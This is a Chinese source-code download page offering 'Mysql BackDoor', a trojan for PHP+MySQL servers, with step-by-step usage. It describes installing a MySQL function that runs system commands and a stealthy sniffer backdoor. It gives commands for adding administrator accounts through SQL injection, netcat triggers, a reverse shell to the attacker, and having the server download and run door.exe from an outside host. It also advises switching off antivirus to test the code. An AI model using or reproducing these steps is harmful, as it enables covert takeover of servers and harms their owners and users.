资源大全_资源网 登录

首页  php  jsp  js  java  python  .net  H5  asp  易语言  C#   jQuery  游戏  微信小程序  插件

您当前的位置:首页 > php

Mysql BackDoor PHP+Mysql服务器 后门

2021-01-21 19:46:33  35资源网(www.35d.net)
  php
下载本资源原文网址:http://www.daima.org/php/php8090.html
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP,WIN2003+MYSQL5.0.X下通过.
安装
将Mysql.php传到PHP服务器上,依填上相应的Host-User-Password-DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
使用state函数
State函数实际是一个和PHP的"system()"功能相同的函数,可以用来执行系统命令.在"请输入SQL命令:"处填写要执行的mysql语 句,如" select state("net user nohack /add")",点击"执行SQL语句"后,便会得到运行结果.
使用基于Sniff的后门
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt!(注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-//www.x.com/door.exe -c mydoor.exe!(注意:最后的"!"不可省略)
除了发送"Mysql-c-",其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
卸载
在Mysql上运行"drop function state"便可卸载,但同时会造成mysql进程退出,重启后恢复正常.

注意:源码因为是黑客相关,已经被杀毒软件认识了,所以大家可以关了软件再测试。
下载地址: [ 下载地址1 ]  消耗积分:0分  [ 下载地址2 ]  消耗积分:0分
[ 下载地址3 ]  消耗积分:0分    
网盘密码 (密码:)
php 贼狗自动链(仿百度) v1.2
Online-Bookmarks 网络收藏夹程序汉化版 v0.8.14
赞助
相关代码
    无相关信息
最新代码
栏目热门
Tags: 微信小程序 源码 源码下载 HTML5游戏 92Game 整站源码 PHP 商业版 帝国CMS cms 完整版 网站源码 织梦模板 织梦 wordpress插件 下载 最新 html5源码 微信小程序源码 帝国CMS内核 带后台 微信公众号 DEDECMS HTML5 完整源码 微信 自动采集 完整版源码 ecshop 源代码 Thinkphp dede织梦模板 PHP+MYSQL 小程序 小程序源码 DESTOON6.0 搜客淘宝客 淘宝客 更新包合集 带手机版 整站 手机版 完整运营版 游戏 92 92kaifa 完整商业版源码 管理系统 dedecms模板 织梦CMS内核 带数据 电影网站 系统 多城市 生成静态 免费下载 一键安装版 系统源码 多多淘宝客 同步包
资源大全_资源下载网站:www.35d.net    本站资源仅限研究学习使用,如需商用请联系版权方,     本站事务联系QQ:939804642